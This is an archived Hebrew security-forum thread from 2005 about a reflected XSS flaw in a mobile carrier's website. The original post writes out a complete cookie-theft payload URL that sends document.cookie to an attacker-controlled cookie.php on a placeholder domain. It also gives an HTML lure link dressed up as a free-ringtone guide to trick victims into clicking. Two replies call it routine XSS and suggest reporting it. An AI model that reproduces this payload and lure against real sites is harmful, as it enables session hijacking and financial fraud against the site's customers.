Logo

רד-בורד: ארכיון

ראשי > אבטחת מידע > באג Script שמצאתי באתר של Orange.

30/06/2005 08:19:31 B-Nary
הבאג מאוד פשוט.
בדף main.aspx אפשר לשלוח נתון דרך GET (דרך הכתובת) שמפעיל פונצקיית JavaScript. במקור הלינק הוא:
קוד:http://orange.co.il/content_site/main.aspx?siteId=1&init=handsetChange(5)
בדקתי את הקוד, ומצאתי את זה:
קוד:<body bgcolor="#000000" onload="init();handsetChange(5);" topmargin="5" rightmargin="5" leftmargin="5" bottommargin="5">
חשבתי מה יקרה אם אני אשים בכתובת alert(document.cookie) ולא handsetChange(5).
כמו שחשבתי, זה אכן הקפיץ הודעת alert עם ה-Cookie שלי.
אפשר לבנות דף ששומר את ה-cookie בקובץ מסוים, שנקרא לו cookie.php, ואז לשנות את הלינק לכזה:
קוד:http://orange.co.il/content_site/main.aspx?siteId=1&init=window.open(’http://www.yourdomain.com/cookie.php?cookie=’%2Bescape(document.cookie))
ולומר שזה איך להוריד צלצולים בחינם, לדוגמה:
קוד:<a href="http://orange.co.il/content_site/main.aspx?siteId=1&init=window.open(’http://www.yourdomain.com/cookie.php?cookie=’%2Bescape(document.cookie))">מדריך להורדת צלצולים בחינם מאורנג’</a>
ואז כשהקורבן יכנס ה-Cookie שלו שעשוי להכיל את הפרטים להתחברות ל-Orange (שימו לב שמדובר פה בעניין כספי - אפשר להוריד צלצולים על חשבונו) ישלח ל-cookie.php.

מה דעתכם?[ההודעה נערכה על-ידי B-Nary ב-30/06/2005 22:50:28]
30/06/2005 13:38:27 cp77fk4r
כן, מדובר פה בXSS רגיל, גילוי נחמד, הוא קיים בעוד הרבה מקומות אחרים במערכת האתר שלהם, שלח להם מייל.
04/07/2005 20:39:02 B-HFH
כן זה XSS.
אבל לא כל באג כזה יכול להיות מנוצל.
אם אתה רשום ב orange - תבדוק שהמערכת מזהה אותך אוטומטי ומאפשרת לך לשלוח לעצמך דברים ללא הקלדת סיסמא שוב.
אם כן זה מסוכן ותדווח להם.
עמודים: 1